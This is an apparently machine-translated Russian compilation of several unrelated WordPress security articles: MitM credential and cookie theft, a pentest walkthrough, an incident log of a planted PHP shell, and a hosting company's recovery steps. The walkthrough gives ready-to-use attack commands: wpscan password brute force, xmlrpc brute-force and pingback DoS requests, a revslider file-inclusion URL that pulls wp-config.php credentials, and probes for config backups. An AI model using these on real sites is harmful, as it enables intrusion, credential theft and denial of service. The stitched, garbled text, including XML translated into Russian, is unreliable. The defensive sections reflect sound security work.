Атаки типа «человек посередине» (MitM) обычно (не всегда) предполагают, что злоумышленник находится в той же локальной сети (LAN), что и вы. Одна из наиболее распространенных атак MitM связана с спуфингом ARP. Детали спуфинга ARP выходят за рамки этой статьи. Однако в результате успешной спуфинговой атаки ARP ваш сетевой коммутатор или маршрутизатор будет обманут, заставив думать, что машина злоумышленника — это ваша машина, и наоборот.
Результатом этого является то, что каждая сторона не отправляет данные друг другу напрямую, а сначала отправляет их злоумышленнику. Чтобы все выглядело нормально, злоумышленник перенаправляет трафик в законное место назначения. Однако это дает злоумышленнику возможность проверить и даже изменить содержимое передачи.
Взлом веб-сайтов WordPress — кража паролей и учетных данных для входа
Чтобы понять, как могут быть украдены учетные данные WordPress, давайте сначала рассмотрим HTTP-запрос, содержащий предоставленные учетные данные, с помощью встроенных в браузер инструментов разработчика.
Обратите внимание, что это , а не атака Man-in-the-Middle (MitM), но это помогает проиллюстрировать, что искать позже.
Теперь посмотрим, что увидит злоумышленник при проверке незашифрованного HTTP-трафика. В этом примере мы используем Wireshare — бесплатный и популярный инструмент сетевого анализа.
Кража файлов cookie аутентификации
Помимо кражи паролей/учетных данных WordPress, злоумышленник также может просто украсть ваш файл cookie аутентификации, чтобы выдать себя за вас.
Как файлы cookie связаны с аутентификацией?
HTTP — это протокол без сохранения состояния. В HTTP сервер не придает особого значения запросам, поступающим через один и тот же сокет TCP. Это означает, что если вы не хотите вводить свой пароль каждый раз, когда запрашиваете страницу, браузер должен хранить временный токен. Этот токен известен как токен сеанса . Браузер автоматически отправляет этот токен при каждом запросе. К счастью, в браузерах для этого есть встроенный механизм — файлы cookie. Вот почему удаление файлов cookie вашего браузера приведет к выходу из системы со всех веб-сайтов.
Это означает, что злоумышленнику даже не нужен ваш пароль, чтобы выдать себя за вас. Единственное, что им нужно, это получить ваш токен сеанса.
И снова та же информация доступна злоумышленнику в Wireshark.
Используя бесплатное расширение для браузера, такое как Cookie-Editor, злоумышленник может легко использовать значение украденного файла cookie в своем браузере и начать просматривать админку WordPress от вашего имени.
Защита себя / вашего сайта WordPress от атак MitM
Атаки типа «человек посередине», подобные показанным в этой статье, требуют от злоумышленника очень мало усилий. Особенно в общедоступных или плохо защищенных сетях, таких как общедоступный Wi-Fi. К счастью, защитить себя от этих хакерских атак очень просто — обязательно включите и примените HTTPS на своем веб-сайте WordPress.
HTTPS шифрует трафик между вашим браузером и сервером. Если злоумышленник попытается прочитать содержимое HTTPS-трафика, все, что он увидит, — это много бессмысленного, искаженного зашифрованного текста.
Дополнительные меры предосторожности по усилению безопасности WordPress
Несмотря на то, что вы, безусловно, должны включить HTTPS на своем веб-сайте в качестве первоочередной задачи для предотвращения атак «человек посередине» (MitM), следующие рекомендации являются хорошими рекомендациями, когда речь идет о безопасности WordPress. и твердение.
- Добавьте двухфакторную аутентификацию (2FA) для повышения безопасности механизма аутентификации вашего сайта WordPress
- Использовать надежные пароли WordPress, чтобы значительно усложнить атаки по подбору паролей
- Ограничение неудачных попыток входа в WordPress для предотвращения таких атак, как DDoS и атаки с подбором пароля
- Ведите журнал активности WordPress для отслеживания несанкционированного доступа к администратору WordPress
- Установите монитор целостности файлов WordPress для обнаружения вредоносных изменений файлов в вашей установке WordPress
- Установите брандмауэр WordPress и защитное решение для предотвращения распространенных атак на веб-приложения.
Как взломать WordPress?
Прежде чем начать вести этот блог, сначала посетите перечисление wordpress блог.
Исследователи обнаружили продолжающуюся вредоносную рекламу (интернет-реклама для распространения вредоносного ПО), направленную на заражение миллионов веб-сайтов WordPress с помощью бэкдора и использование различных уязвимостей плагинов WordPress. сотни плагинов WordPress установлены разными разработчиками по всему миру. Киберпреступники запускают полезную нагрузку, используя уязвимости, которые находятся в некоторых из самых популярных плагинов WordPress, и внедряя вредоносные скрипты в неисправленный веб-сайт WordPress.
Злоумышленник: Kali Linux
Цель: WordPress
Содержание
1.Брутфорс формы wp-login.php
2.Брутфорс Вход через xmlrpc.php
3.Отказ в обслуживании (DOS) через xmlrpc. php
4. Использование плагина WordPress
5. Использование примера темы WordPress
6. Обнаружение и захват учетных данных при незащищенном входе в систему
7. Взлом инструментов системного администрирования
8. Обнаружение контента
9. Уязвимое серверное программное обеспечение
1. Брутфорс wp-login.php Форма
Наиболее распространенной атакой на пользователя WordPress является подбор пароля учетной записи для получения доступа к серверной части системы WordPress. Другие способы взлома пароля включают перехват пароля в виде открытого текста через сеанс входа в систему HTTP или даже получение учетных данных от регистратора ключей на рабочей станции администратора WordPress. Учетные записи с доступом на уровне администратора являются наиболее востребованными из-за количества вред, который может совершить пользователь с правами администратора; добавление командной оболочки PHP или вредоносного javascript непосредственно через интерфейс администратора — распространенные примеры.
С именами пользователей, которые мы собрали во время сбора информации, мы можем начать (или просто попробуйте admin). Взгляните на форму входа /wp-login. php , обратите внимание, как неудачные попытки входа подтверждают имя пользователя при вводе неправильного пароля. Это очень полезно для злоумышленника…. это также делает вещи более удобными для конечного пользователя, который забыл свое имя пользователя и пароль. Эта «функция» обсуждалась, и было решено сохранить этот ответ в коде WordPress.
Перебор учетных записей пользователей возможен с помощью ряда инструментов с открытым исходным кодом. Кроме того, доступны скрипты, похожие на червей, которые распространяются по экосистеме WordPress, ища и распространяясь на сайты WordPress со слабыми паролями администратора.
WPScan
Упомянутый ранее инструмент WPScan в дополнение к перечислению также может выполнять атаки входа в систему методом перебора.
wpscan --url example.com --wordlist /usr/share/wordlist/rockyou.txt --username testuser --threads 20
Nmap NSE Script
Сканер портов Nmap может делать гораздо больше, чем находить открытые порты. Последние версии Nmap поставляются в комплекте со сценариями NSE, которые можно использовать для тестирования множества различных уязвимостей; включая перечисление пользователей и перебор паролей WordPress.
nmap -sV --script http-wordpress-enum --script-args limit=25 example.com ГОСУДАРСТВЕННАЯ СЛУЖБА ПОРТА ПРИЧИНА 80/tcp открыть HTTP-синхронизацию | http-wordpress-перечисление: | Имя пользователя найдено: admin | Имя пользователя найдено: testadmin | Имя пользователя найдено: Фред | Имя пользователя найдено: Алиса | Имя пользователя найдено: bob |_Поиск остановлен на идентификаторе № 25. При необходимости увеличьте верхний предел с помощью «http-wordpress-enum.limit»
Burp Suite
Для тех, кто знаком с тестированием безопасности веб-приложений, инструмент Burp Suite Intruder также может использоваться для взлома паролей WordPress. В конце концов, попытка входа в WordPress — это всего лишь запрос HTTP POST. Настройте Burp Intruder для отправки действительного имени пользователя (или списка имен пользователей) вместе со списком возможных паролей и дождитесь успешного входа в систему.
2. Вход методом грубой силы с использованием xmlrpc.php
Возможность xmlrpc.php — это конечная точка API, которая позволяет мобильным приложениям и другим программируемым получать доступ к серверным функциям сайта WordPress, таким как публикация сообщений. Он включен по умолчанию, и возможны несколько атак на конечную точку в зависимости от разрешений и версии целевой установки WordPress.
Используя конечную точку xmlrpc.php для атаки на учетные записи WordPress, мы можем обойти подключаемые модули безопасности, которые защищают форму входа от злоупотреблений. Эта атака с подбором пароля также может быть быстрее, в результате чего вы можете попытаться ввести больше паролей.
Обратите внимание на -d, в curl это данные, которые отправляются как часть запроса POST. Вы также можете использовать Burp или ваш любимый язык сценариев для этого запроса.
curl -X POST -d "" http://examplewp. com/xmlrpc.php wp.getUsersBlogs admin pass
В ответе увидим неверный пароль или успех. Это легко заметить и использовать в сценарии.
3. Отказ в обслуживании (DOS) через xmlrpc.php
Другое использование конечной точки xmlrpc.php — выполнение атаки типа «отказ в обслуживании». Если эта возможность включена, мы можем отправить небольшой запрос на сервер и заставить его ответить с полной страницей контента на выбранную нами цель. Идея состоит в том, чтобы делать несколько запросов из разных систем и направлять их все на один хост. Потенциально отключив его из-за перегрузки сети.
Сначала мы перечисляем возможности конечной точки xmlrpc.php.
curl -X POST -d "" http://examplewp.com/xmlrpc.php Ответом будет список доступных методов. <методответ> <параметры> <параметр> <значение> <массив><данные> system.listMethods системные.listMethods system. getCapabilities pingback.extensions.getPingbacks pingback.ping **** усеченный **** mt.publishPost
Обратите внимание на файл pingback.ping, указывающий на то, что функция обратного вызова включена. Используйте следующие данные для попытки проверки связи.
<вызов метода>pingback.ping <параметры><параметры>http://**отказ в обслуживании-цель**:**portno** http://**blog-url-from-wp** значение>парам>парамс>
Отключение доступа к xmlrpc.php с вашего веб-сервера или использование .htaccess рекомендуется, если вы не используете API. Это не только заблокирует любые атаки, но и уменьшит количество шума в ваших журналах от ботов, пытающихся поразить эти конечные точки API.
4. Использование плагина WordPress
Плагины, темы и ядро WordPress содержат большое количество PHP-кода от разработчиков со всего мира. Эти разработчики имеют разные способности и фокус, когда дело доходит до написания безопасного программного обеспечения. По этой причине злоумышленнику доступны тысячи уязвимостей, которые можно использовать. Обновление плагинов, ядра WordPress и тем должно быть рутинной задачей для любого администратора WordPress, чтобы обеспечить исправление известных уязвимостей. Общие уязвимости включают XSS, внедрение SQL, загрузку файлов и выполнение кода. Все это может иметь разрушительные последствия для сайта WordPress. Ищите в Metasploit иexploit-db.com ошибки WordPress, которые можно использовать.
Пример эксплойта Revslider
Пример эксплойта плагина WordPress основан на уязвимости, обнаруженной 5 лет назад. Уязвимый плагин revslider привел к компрометации десятков тысяч сайтов WordPress. По сей день в журналах нашего веб-сервера есть попытки использовать его даже в 2019 году. Одна из причин, по которой этот плагин был таким популярным, заключается в том, что он был связан со многими темами.
Возможно несколько вариантов эксплуатации, но это, пожалуй, проще всего продемонстрировать. Эксплуатация так же сложна, как загрузка этого URL в браузере.
https://example.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
HTTP-запрос загрузит файл wp-config.php из уязвимый сайт, если на нем установлена эксплуатируемая версия revslider. Тип эксплойта известен как включение локального файла, поскольку злоумышленник обманывает код приложения, заставляя его включать конфиденциальный файл в выходные данные. wp-config.php обычно недоступен и содержит учетные данные базы данных для Пользователь базы данных WordPress.
С паролем базы данных злоумышленник может попытаться войти в систему как администратор WordPress, используя тот же пароль (если пароли использовались повторно). Более распространенным вектором атаки будет вход в скрипт phpmyadmin, если он установлен, так как он использует учетные данные базы данных. Если MySQL открыт, может даже быть возможно напрямую подключиться к базе данных, используя клиент базы данных MySQL и украденные учетные данные.
Доступ к базе данных предоставляет злоумышленнику возможность сбросить пароль администратора, попытаться взломать хэш администратора, изменить содержимое базы данных, добавив вредоносные js или iframe. Есть много возможностей для дальнейшей эксплуатации после утечки учетных данных в wp-config.php.
5. Пример темы WordPress Exploit
Эксплойты доступны из различных мест и форумов. В этом примере используется эксплойт из популярной платформы Metasploit Exploitation Framework. Уязвимой темой является очень популярная оптимизированная пресса. Уязвимость была выпущена еще в 2013 году, и версии после 1.45 не уязвимы для этого эксплойта. Многочисленные боты и сценарии автоматизированных атак, использующие сайты WordPress, не выполняют фазу перечисления, они просто запускают эксплойты на тысячах сайтов и надеются на успешную полезную нагрузку. Плагины и темы, которые не включены, могут быть использованы. Сканирование местоположений по умолчанию для этих уязвимых файлов — очень распространенная атака автоматических ботов.
6. Проанализируйте и зафиксируйте учетные данные при незащищенном входе в систему
Без дополнительных мер безопасности (TLS/SSL) доступ к информационной панели /wp-admin/ осуществляется через незашифрованное соединение. Это означает, что если вы входите на свой сайт WordPress через незащищенную сеть, например, через беспроводную сеть в местном кафе или аэропорту, ваш логин и пароль для управления сайтом могут быть перехвачены злоумышленником, наблюдающим за вашим сеансом.
В этом примере захвата Wireshark мы можем ясно видеть, что имя пользователя и пароль перехватываются в нашем POST-запросе к wp-login.php.
7. Взлом средств системного администрирования
Успешная атака с подбором пароля на учетную запись управления сервером даст злоумышленнику полный доступ к серверу и приложению WordPress. Службы, которые могут быть атакованы с помощью подбора пароля методом грубой силы, включают:
> SSH-сервис >Служба базы данных MySQL > Управление веб-сервером >CPanel или WHCMS Панели управления веб-хостингом >Приложение для управления базой данных phpMyAdmin
Снижение вероятности компрометации учетной записи управления:
>Используйте надежные пароли везде, не используйте их повторно! >Перенести SSH на другой порт >Используйте TLS/SSL для веб-служб управления, чтобы предотвратить прослушивание и компрометацию учетных данных. >Белый список IP-адресов, которые могут подключаться к интернет-сервисам
8. Обнаружение контента
Обнаружение контента — это процесс поиска интересующих элементов в веб-пути. Это применимо к любому веб-приложению, но, поскольку мы атакуем WordPress, ориентируйтесь на типичные файлы и пути, представляющие интерес в установке WordPress.
Например:
curl https://example.com/wp-config.php.bak curl https://example. com/.wp-config.php.swp
В этих двух примерах curl используется для поиска возможного файла резервной копии файла wp-config.php, который мы обсуждали ранее, поскольку он содержит конфиденциальную информацию, включая учетные данные базы данных. Вторая попытка пытается загрузить файл резервной копии, который vim автоматически создает при редактировании файла. Хорошая причина не редактировать файлы прямо на ваших производственных сайтах!
Использование curl для выполнения этой задачи поиска сотен или даже тысяч общих файлов может быть выполнено с помощью небольшого количества сценариев. С другой стороны, более подходящие инструменты, такие как Burp Suite или gobuster, инструмент, который очень быстр благодаря своей параллельной обработке, будут работать намного лучше.
9. Уязвимое серверное программное обеспечение
Тестирование самого приложения WordPress — это только часть обеспечения безопасности вашего веб-сайта. Сервер, на котором размещается веб-сайт, также должен быть защищен. Уязвимости безопасности могут, конечно, присутствовать в серверном программном обеспечении или операционной системе. Примеры можно найти в любом списке рассылки по уязвимостям. Недавно в Exim, одном из самых популярных серверов доставки почты в Интернете, была обнаружена уязвимость, которая делает возможным удаленное выполнение кода. PHPMyAdmin — популярное приложение для атак из-за его популярности и длинного списка уязвимостей.
Неверная конфигурация программного обеспечения сервера
Даже если уязвимости, которые можно использовать, отсутствуют, простая неправильная конфигурация может сделать службу уязвимой. Часто уязвимости в системе безопасности возникают просто из-за неправильной настройки перегруженным работой системного администратора.
Как взломать сайт WordPress за 5 секунд!
Помните комикс Счастливчик Люк, самая быстрая пушка на Дальнем Западе?
Он стрелял быстрее своей тени!
Это изображение пришло мне в голову, когда вчера днем я получил предупреждение от подключаемого модуля безопасности Sucuri, сообщающее о необычном файле на одном из веб-сайтов моего клиента.
Не зная имени файла ( .query.php
) и его характеристик (скрытый файл и сохраненный в папке wp-includes
), я подключился к серверу по SSH, чтобы проверить содержимое файла…
сюрприз!!! 🙂
Удаленная оболочка PHP…
Я немедленно связался с ИТ-менеджером компании клиента, чтобы попросить разъяснений, так как они установили и виртуальный сервер (VPS), и WordPress.
Сисадмин, немного разочарованный, заверил меня, что установка произведена по установленным правилам и что взлом сайта невозможен, так как только что создан виртуальный сервер, устанавливающий обычную операционную систему (Ubuntu 20.04 ) с обычными рекомендациями по безопасности, и что WordPress был установлен автоматически с использованием последней версии (5.9.2) что не было установленного плагина и использовалась базовая тема 2022… Как это возможно, что сайт был взломан?!
Игра становилась все более и более запутанной….
Единственный способ узнать это — просмотреть файл журнала веб-сервера (в данном случае Nginx) и найти любые признаки компрометации!
И вуаля!!
Рассмотрим каждый шаг подробно:
1) «GET /wp-admin/install. php HTTP/1.1» 200 13315 «-» «curl/7.74.0»
Страница установки WordPress отображается успешно ( HTTP 200)
2) «POST /wp-admin/install.php?step=2 HTTP/1.1» 200 5176 «-» «curl/7.74.0»
Успешная установка WordPress
3) «POST /wp-login.php HTTP/1.1» 302 5 «-» «curl/7.74.0»
Успешный вход в панель управления WordPress
4) «GET /wp-admin/plugin-install.php ?tab=upload HTTP/1.1” 200 26399 “-” “curl/7.74.0”
Выбрана страница для ручной загрузки плагина
5) «POST /wp-admin/update.php?action=upload-plugin HTTP/1.1» 200 17887 «-» «curl/7.74.0»
Плагин Form Maker установлен
6) «GET /wp-content/plugins/contact-form-maker/contact-form-maker.php?a=0&b=930015466278503187 HTTP/1.1» 200 5 «-» «curl/7.74.0»
Вызывается оболочка PHP с помощью плагина Form Maker
7) «POST /wp-includes/. query.php HTTP/1.1» 200 40 «-» «Go-http-client/1.1»
Оболочка PHP (.query.php) скопирована в системную папку wp-includes
Глядя на время различных шагов, вы можете видеть, что атака началась в 14:25:23 и закончилась в 14:25:28, что означает, что для взлома сайта потребовалось всего 5 секунд!
Для тех из вас, кто привык иметь дело со взломанными сайтами, вы уже поняли, что этот взлом является «атакой WPsetup», которая существует уже много лет.
1) Заблокировать IP-адрес хакера
Первое, что нужно сделать, это заблокировать доступ к сайту и, возможно, к самому серверу с IP-адреса хакера.
На уровне сайта это можно сделать с помощью файла .htaccess
(если вы используете веб-сервер Apache) или файла конфигурации сайта (если Nginx). На уровне сервера вам необходимо добавить правило deny
в ваш брандмауэр (WAF, облачный брандмауэр или системный брандмауэр IPTables или ufw).
2) Переместить зараженный файл
Используя доступ по SSH или FTP, переместите (не удаляйте!) файл в папку на вашем ноутбуке. Рекомендуется сохранить копию файла в качестве доказательства на случай, если вам понадобится отправить его в юридический орган.
3) Переустановите WordPress
В таких случаях рекомендуется переустановить WordPress. Если у вас есть SSH-доступ к виртуальному серверу, используйте командную строку WordPress ( wp-cli
). Если у вас нет доступа по SSH, загрузите WordPress на свой ноутбук, разархивируйте файл и замените через cPanel или FTP все системные файлы WordPress (файлы корневой папки, папки wp-admin
и wp-includes
. ). НЕ заменять wp-config.php
, так как он имеет настройки конфигурации базы данных вашего сайта).
4) Запустите сканирование на наличие вредоносных программ
После переустановки WordPress запустите сканирование на наличие вредоносных программ с помощью подключаемого модуля безопасности (Wordfence, Sucuri, вредоносное ПО Ninja и т. д.), а также с помощью проверки сайта Sucuri (https://sitecheck. sucuri. net)
5) Сохраните копию лог-файлов
Через SSH-доступ или запросив его у вашего хостинг-провайдера, сделайте копию лог-файлов веб-сервера (Apache, Nginx или другого).
6) Сообщить об инциденте
С помощью команды whois hacker_IP
вы должны узнать у мейнтейнера IP-адрес. В выходных данных вы найдете адрес электронной почты для использования в этих случаях ( [email protected]'s_domain
).
Напишите сообщение электронной почты с отчетом об инциденте, включая технические подробности (особенно файлы журнала). Поищите в Интернете, вы должны найти шаблоны для использования в этом вопросе.
Если взломанный сайт принадлежит европейской компании, Общий регламент по защите данных (GDPR) требует, чтобы об инциденте сообщалось в компетентный национальный надзорный орган.
Настройка WordPress
При установке WordPress всегда выбирайте автоматическую установку (Softaculous, как в cPanel или других панелях администрирования).
Если по какой-либо причине вы предпочитаете ручную установку (загрузите последний файл .zip, разархивируйте его, а затем подключитесь к сайту, чтобы запустить мастер установки), я настоятельно рекомендую вам начать использовать командную строку WordPress (wp-cli), которая позволит автоматизировать весь процесс.
Если вы действительно не хотите связываться с еще одним инструментом для изучения или у вас нет доступа SSH к вашему виртуальному серверу, ПЕРЕД распаковкой установочного файла создайте .htaccess
и сохраните его в корневом каталоге вашего сайта.
Внутри файла добавьте следующие директивы:
запретить заказ, разрешить
запретить всем
разрешить с YOUR_IP
Замените YOUR_IP на общедоступный IP-адрес вашего интернет-маршрутизатора (вы можете найти его, подключившись к этому сайту: http: //ipinfo.io/ip
После завершения установки не забудьте удалить блокирующие директивы из файла .htaccess
!! Затем ему пришло в голову, что во время автоматической установки WordPress он не ввел правильные учетные данные для доступа к базе данных, и при попытке открыть домашнюю страницу сайта появлялась ошибка базы данных. 0005
Времени, необходимого для обновления настроек базы данных в файле wp-config.php
(менее 1 минуты…), хватило для взлома сайта!!
Подводя итог, старайтесь как можно чаще устанавливать WordPress автоматически, и, прежде всего, я никогда не устану повторять это: постоянно следите за своим сайтом!
Признаки и способы восстановления после них
Вордпресс Устранение неполадок
01 сентября 2022 г.
Джордана А.
7 мин Чтение
Ежедневно происходит более 2200 кибератак, жертвами которых становятся более 800 000 человек в год. С таким количеством киберугроз, вырисовывающихся в Интернете, есть шанс, что одна из них проникнет на ваш сайт WordPress.
Однако не стоит паниковать, если ваш сайт WordPress был взломан. В этой статье мы рассмотрим 11 шагов, чтобы восстановить ваш сайт и предотвратить будущие взломы.
Давайте начнем с выяснения, является ли проблема взломом WordPress.
Загрузить контрольный список безопасности WordPress
Диагностировать взломанный веб-сайт не всегда просто. Проверьте наличие следующих признаков, чтобы понять, был ли взломан ваш сайт:
- Вы не можете войти в панель администратора WordPress.
- Вы не загрузили контент и дизайн.
- Внезапное падение трафика.
- Сайт перенаправляет пользователей и рассылает спам.
- Предупреждения черного списка браузера появляются при посещении вашего веб-сайта WordPress.
- Ваши файлы WordPress отсутствуют.
- Журналы сервера обнаруживают необычные действия и посещения из неизвестных мест.
- Новый участник с правами администратора был добавлен без вашего согласия.
- Ваш подключаемый модуль безопасности предупреждает вас о возможном взломе.
Как сайт WordPress подвергается взлому
Вот некоторые из наиболее распространенных кибератак, которые могут использовать уязвимости безопасности WordPress:
- Бэкдоры ‒ вредоносное ПО, которое сводит на нет процедуры аутентификации для доступа к основным файлам WordPress.
- Атаки грубой силы ‒ метод взлома, использующий стратегию проб и ошибок для угадывания ваших учетных данных для входа.
- Межсайтовый скриптинг (XSS) ‒ атака путем внедрения кода, которая запускает вредоносные скрипты в код веб-сайта.
- Атаки с внедрением SQL ‒ метод взлома, включающий внедрение кода, нацеленного на уязвимые SQL-запросы.
- Вредоносная переадресация ‒ бэкдор, перенаправляющий посетителей вашего сайта на подозрительный сайт.
- Pharma hacks ‒ спам-атака SEO, которая заражает ваш сайт вредоносным контентом. В результате ваш веб-сайт начнет ранжироваться по этим спам-ключевым словам, что нанесет ущерб репутации вашего бренда.
- Отказ в обслуживании (DoS) ‒ атака, предназначенная для отключения веб-сайта или сети путем перегрузки целевой системы запросами.
Причины взлома сайта WordPress
Вы можете задаться вопросом, почему ваш сайт был взломан. Вот три основные причины, по которым хакеры могут рассматривать ваш сайт WordPress как главную цель для своих кибератак.
Небезопасные учетные данные для входа
8% зараженных веб-сайтов WordPress имеют слабые пароли, такие как «12345», «picture1» и «password». Хотя надежный пароль не гарантирует защиты от взлома, безопасные учетные данные для входа добавляют еще один уровень безопасности вашему веб-сайту и личной информации.
Устаревшее программное обеспечение
Устаревшие основные файлы, плагины и темы WordPress являются одной из наиболее распространенных причин взлома веб-сайтов. Поддержание ваших установок WordPress в актуальном состоянии имеет важное значение, поскольку обновления программного обеспечения поставляются с исправлениями безопасности, которые устраняют уязвимости предыдущей версии. Без обновлений хакеры могут использовать эти уязвимости для доступа к вашему сайту WordPress.
Плохой код веб-сайта
Некачественные плагины и темы WordPress, как правило, имеют плохой код, что создает уязвимости на вашем сайте WordPress. Поэтому мы рекомендуем получать ваши темы и плагины из официального репозитория WordPress или авторитетных торговых площадок, которые обеспечивают регулярные обновления и поддержку.
11 решений для исправления взломанного веб-сайта WordPress
После подтверждения того, что ваш сайт WordPress взломан, пришло время исправить проблему. В следующем разделе мы объясним, как очистить взломанный сайт WordPress за 11 простых шагов.
1. Переведите WordPress в режим обслуживания
Если у вас все еще есть доступ к панели управления WordPress, немедленно переведите свой веб-сайт в режим обслуживания. Это не позволит посетителям открыть ваш взломанный сайт WordPress, защитив их личную информацию и устройство от любых атак. Вы также сохраните доверие к своему бренду, не позволяя взломанному сайту WordPress работать.
Пользователи Hostinger могут включить режим обслуживания через свою панель управления hPanel. Вам нужно всего лишь перейти к Dashboard в разделе WordPress панели hPanel и выберите опцию Maintenance mode .
Pro Tip
Ознакомьтесь с нашей статьей о режиме обслуживания WordPress, чтобы узнать о различных способах его включения.
2. Сбросьте пароль WordPress
Если хакеры получат доступ к вашему сайту, ваши учетные данные для входа будут скомпрометированы. Поэтому лучший первый шаг для исправления вашего взломанного сайта — сбросить пароли администратора WordPress, FTP, базы данных и учетной записи хостинга.
Многие инструменты управления паролями, такие как NordPass, предлагают генератор, который вы можете использовать для создания надежных паролей и обеспечения их безопасности для вас. Идеальный пароль должен содержать не менее 16 символов, включая буквы, цифры и символы.
Мы также рекомендуем включить двухфакторную аутентификацию и ограничить попытки входа в систему, чтобы добавить дополнительные уровни защиты к вашим учетным данным для входа в WordPress.
3. Обновите WordPress
Прежде чем пытаться исправить взломанный веб-сайт, лучше всего обновить старые установки WordPress. Это поможет помешать хакерам воспользоваться уязвимостями сайта, чтобы отменить исправление, и сохранить ваш сайт в безопасности после взлома.
Pro Tip
Ознакомьтесь с нашей статьей об обновлении WordPress, если вам нужна помощь. Мы также рекомендуем обновить ваши темы и плагины, поскольку кибератаки обычно проникают в WordPress через устаревшие плагины и файлы тем.
4. Деактивация плагинов и тем
Деактивация ваших плагинов и тем, а затем их повторная активация по одному позволяет сократить количество зараженных установок. Как только вы обнаружите ошибочные установки, деактивируйте и удалите их.
Это также идеальное время для удаления неиспользуемых установок WordPress с вашего сайта. Наличие ненужных тем и плагинов, установленных на вашем сайте, может создать точки доступа для вредоносных программ для взлома WordPress, даже если они неактивны.
Кроме того, удалите все плагины и темы, полученные за пределами официальных каталогов тем и плагинов WordPress, поскольку эти типы программного обеспечения имеют более высокий риск наличия вредоносного кода.
Вот шаги для отключения плагина:
- Перейдите к Плагин -> Установленные плагины из панели администратора WP.
- Чтобы деактивировать один плагин, нажмите на опцию Деактивировать под ним.
- Чтобы деактивировать сразу несколько плагинов, установите флажок рядом с выбранными и выберите Деактивировать из выпадающего меню. Щелкните Применить .
5. Переустановите WordPress
Если ни один из предыдущих шагов не работает, ваши файлы ядра WordPress могут быть заражены. В этом случае вам придется переустановить файлы ядра и начать заново.
Проще всего это сделать через панель администратора WordPress. Перейдите на панель инструментов -> Обновления и нажмите кнопку Переустановить .
Перед началом новой установки WordPress обязательно сделайте резервную копию файлов вашего веб-сайта. Не перезаписывайте старую версию резервной копии сайта новой. Позже вы сможете сравнить взломанные системные файлы WordPress с чистой версией, чтобы идентифицировать и удалить подозрительные файлы.
Pro Tip
Прочтите нашу статью о переустановке WordPress, чтобы узнать больше о других методах.
6. Удаление новых пользователей WordPress с правами администратора
Одним из наиболее распространенных признаков взлома сайтов WordPress является появление новых пользователей с правами администратора. Если вы видите какие-либо недавно добавленные учетные записи администратора, которые вы или другие администраторы веб-сайта не распознаете, немедленно удалите их.
Совет профессионала
Обратитесь к нашей статье об управлении ролями пользователей WordPress, чтобы узнать, как удалить учетные записи пользователей с вашего сайта.
7. Поиск вредоносных программ
Существует два способа удаления вредоносных программ со взломанных веб-сайтов WordPress — вручную или с помощью плагина для удаления вредоносных программ. Мы рекомендуем выбрать последнее, так как неправильное выполнение ручного процесса может ухудшить ситуацию.
Следуйте нашей статье об удалении вредоносных программ WordPress обоими методами. В статье также представлены лучшие плагины безопасности WordPress с функциями удаления вредоносных программ.
8. Отключить выполнение PHP
Хакеры могут создавать бэкдоры на сайтах WordPress, загружая файлы с вредоносным кодом в папку Uploads . Отключение выполнения PHP не позволяет им выполнять эти зараженные файлы.
Сначала создайте файл .htaccess и добавьте в него следующий код:
отрицать от всех
Затем загрузите файл .htaccess в папку wp-content/uploads/ внутри вашего корневого каталога либо с помощью FTP-клиента, либо с помощью файлового менеджера.
9. Очистите базу данных WordPress
После очистки ваших установок WordPress следующим шагом будет просмотр записей в вашей базе данных. Удалите все записи, содержащие вредоносный код, и новые записи, которые вы не узнаете, чтобы хакеры не могли создавать бэкдоры посредством внедрения в базу данных.
Обратите внимание, что выполнение этого процесса вручную рискованно и требует много времени, особенно если у вас много записей. Сайт также может выйти из строя, если вы случайно удалите неправильные записи.
По этой причине мы рекомендуем выбрать один из лучших плагинов базы данных WordPress для этого процесса.
10. Очистите карту сайта WordPress
Карта сайта — это план, который помогает поисковым системам находить и сканировать содержимое вашего веб-сайта. Если его взломают, ваш рейтинг в поисковых системах, скорее всего, упадет. Вот почему стоит регенерировать новую карту сайта при атаках вредоносных программ WordPress.
Самый простой способ создать карту сайта WordPress — использовать плагин WordPress. После этого отправьте новую карту сайта в Google для сканирования через Google Search Console. Имейте в виду, что поисковой системе может потребоваться до двух недель, чтобы просканировать ваш сайт.
11. Свяжитесь с вашим хостинг-провайдером
Если ваш веб-сайт работает на виртуальном хостинге, есть вероятность, что проблема возникает с другого сайта на том же веб-сервере. Свяжитесь с вашим хостинг-провайдером, чтобы проверить, затрагивают ли проблемы безопасности не только ваш сайт.
По крайней мере, ваша хостинговая компания должна иметь возможность восстановить доступ к вашему сайту WordPress или предоставить веб-журналы, чтобы сократить время взлома.
Хостинг-провайдер играет важную роль в обеспечении производительности и безопасности веб-сайта на самом высоком уровне. Если вы не думаете, что ваш текущий веб-хостинг может смягчить атаки взлома WordPress, пришло время искать новый.
Рассмотрите возможность получения управляемого хостинга WordPress, поскольку он обычно предлагает меры безопасности, созданные специально для защиты файлов и установок веб-сайта WordPress.
Заключение
Взлом вашего сайта WordPress — это стресс. Тем не менее, лучше всего перенаправить свою энергию на уменьшение ущерба и принять меры для восстановления вашего сайта WordPress.
Вот краткий обзор:
- Переведите взломанный сайт WordPress в режим обслуживания.
- Сбросьте пароль.
- Обновите свой сайт WordPress.
- Деактивировать плагины и темы.
- Переустановите программное обеспечение WordPress.
- Удалить пользователей WordPress с правами администратора.
- Поиск вредоносных программ.
- Отключить выполнение PHP.
- Очистить базу данных WordPress.
- Очистить карту сайта WordPress.
- Обратитесь к своему хостинг-провайдеру.
Мы надеемся, что эта статья помогла вам восстановить ваш сайт WordPress и свести к минимуму нанесенный ему ущерб. Удачи!
Часто задаваемые вопросы о взломанном WordPress
Легко ли взломать WordPress?
Поскольку WordPress является самой популярной системой управления контентом (CMS), веб-сайты, созданные с помощью этой CMS, являются популярной мишенью для кибератак. Однако 61% зараженных сайтов WordPress были устаревшими, то есть на них не было последних обновлений безопасности для устранения уязвимостей.
Как защитить сайт WordPress без плагинов?
Защитите сайт WordPress:
1. Используйте надежные пароли
2. Ограничьте количество попыток входа в систему
4. Измените префикс таблицы базы данных
4. Выберите надежного хостинг-провайдера.
Хотя вы можете защитить свой сайт без плагина безопасности, его установка даст вам инструменты для резервного копирования встроенных мер безопасности WordPress.
Какая CMS самая безопасная?
Drupal — одна из самых популярных и безопасных CMS на сегодняшний день. Программное обеспечение CMS оптимизирует большинство своих встроенных функций для повышения производительности и безопасности и регулярно проводит тесты безопасности. Однако, поскольку Drupal в основном предназначен для веб-разработчиков, у него более крутая кривая обучения, чем у WordPress.
